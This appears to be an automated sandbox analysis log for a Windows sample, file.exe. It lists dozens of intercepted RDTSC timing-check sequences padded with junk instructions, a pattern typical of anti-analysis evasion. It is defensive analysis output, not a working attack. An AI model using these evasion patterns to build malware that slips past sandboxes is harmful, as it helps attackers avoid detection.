Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162DB4 second address: 1162DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1162DB8 second address: 1162DD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FD648C0B45Eh 0x0000000e push edx 0x0000000f jp 00007FD648C0B446h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1168B0B second address: 1168B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1168B11 second address: 1168B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1168B17 second address: 1168B1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1168B1B second address: 1168B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1168B25 second address: 1168B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BDAA second address: 116BDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116BDAE second address: 116BDC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FD648BC9ACAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C4FD second address: 116C509 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD648C0B446h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C650 second address: 116C65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C65B second address: 116C68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD648C0B454h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD648C0B454h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C68B second address: 116C69C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edi 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C841 second address: 116C84F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 116C84F second address: 116C855 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172B0D second address: 1172B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1172B13 second address: 1172B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11737E4 second address: 11737E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11737E8 second address: 11737EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11737EC second address: 11737F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11737F5 second address: 1173812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173812 second address: 1173857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jng 00007FD648C0B462h 0x0000000d push eax 0x0000000e jmp 00007FD648C0B459h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173857 second address: 1173860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173860 second address: 117386A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117386A second address: 117386E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117386E second address: 1173874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173EB0 second address: 1173EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1173EB5 second address: 1173EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD648C0B454h 0x0000000e pushad 0x0000000f jmp 00007FD648C0B457h 0x00000014 js 00007FD648C0B446h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11726D9 second address: 11726DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11726DD second address: 11726FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B456h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11726FC second address: 1172716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD648BC9AC6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD648BC9ACBh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BC96 second address: 117BC9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BC9D second address: 117BCBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD648BC9ACFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BCBC second address: 117BCC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117BCC0 second address: 117BCC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B971 second address: 117B977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B977 second address: 117B9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648BC9AD2h 0x0000000b jmp 00007FD648BC9ACFh 0x00000010 jmp 00007FD648BC9AD7h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B9B7 second address: 117B9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B9BC second address: 117B9D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD648BC9AD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B9D7 second address: 117B9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 117B9DD second address: 117B9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FD648BC9AC6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A9BD second address: 118A9E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD648C0B446h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FD648C0B455h 0x00000013 push esi 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118A328 second address: 118A347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007FD648BC9AC6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD648BC9AD0h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118C919 second address: 118C92F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118F8E4 second address: 118F93C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD648BC9AD6h 0x0000000e jmp 00007FD648BC9AD5h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jns 00007FD648BC9AC6h 0x0000001f push edx 0x00000020 pop edx 0x00000021 jnc 00007FD648BC9AC6h 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194FEB second address: 1195000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648C0B44Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1195000 second address: 1195004 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119B89E second address: 119B8A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5D93 second address: 11A5DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD648BC9AD3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A5DAA second address: 11A5DF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B453h 0x00000007 jmp 00007FD648C0B456h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jl 00007FD648C0B446h 0x00000015 jns 00007FD648C0B446h 0x0000001b popad 0x0000001c pushad 0x0000001d push edi 0x0000001e ja 00007FD648C0B446h 0x00000024 pop edi 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A470F second address: 11A4713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4713 second address: 11A472A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A472A second address: 11A4735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD648BC9AC6h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4735 second address: 11A473F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD648C0B446h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A473F second address: 11A4743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4743 second address: 11A475D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD648C0B450h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A475D second address: 11A476E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FD648BC9ACAh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A48F0 second address: 11A48F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4A97 second address: 11A4A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A4A9B second address: 11A4AAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007FD648C0B446h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A83A5 second address: 11A83A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A83A9 second address: 11A83AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A83AD second address: 11A83C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jng 00007FD648BC9AC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A83C3 second address: 11A83C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB0D3 second address: 11AB0E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD648BC9AC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF8F7 second address: 11AF8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF8FD second address: 11AF903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AF903 second address: 11AF921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD648C0B456h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11CBA88 second address: 11CBA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9ACAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5A1F second address: 11E5A33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B450h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5A33 second address: 11E5A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E47CD second address: 11E47F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD648C0B459h 0x0000000b jbe 00007FD648C0B446h 0x00000011 popad 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E4946 second address: 11E494F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E50D9 second address: 11E50DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E50DD second address: 11E50E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E50E1 second address: 11E50E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5286 second address: 11E52B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FD648BC9ACFh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jns 00007FD648BC9AC6h 0x00000016 pop ecx 0x00000017 jp 00007FD648BC9ACCh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E52B3 second address: 11E52B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5454 second address: 11E5480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FD648BC9AC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jg 00007FD648BC9AC6h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD648BC9AD0h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5480 second address: 11E5484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E55CD second address: 11E55D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E55D1 second address: 11E55E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Ch 0x00000007 jc 00007FD648C0B446h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E55E7 second address: 11E5603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FD648BC9AC6h 0x0000000a jmp 00007FD648BC9AD2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E5603 second address: 11E561C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B455h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11E9DF8 second address: 11E9E12 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD648BC9ACCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FD648BC9AC6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA120 second address: 11EA125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA125 second address: 11EA172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push ebx 0x0000000e jmp 00007FD648BC9AD4h 0x00000013 pop ebx 0x00000014 jnp 00007FD648BC9AD6h 0x0000001a popad 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FD648BC9ACCh 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA172 second address: 11EA177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA177 second address: 11EA17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA17D second address: 11EA195 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD648C0B446h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA195 second address: 11EA19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA19B second address: 11EA19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EA19F second address: 11EA1A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EBC4A second address: 11EBC64 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD648C0B451h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB750 second address: 11EB75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD648BC9AC6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB75E second address: 11EB776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648C0B44Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB776 second address: 11EB77A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB77A second address: 11EB77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
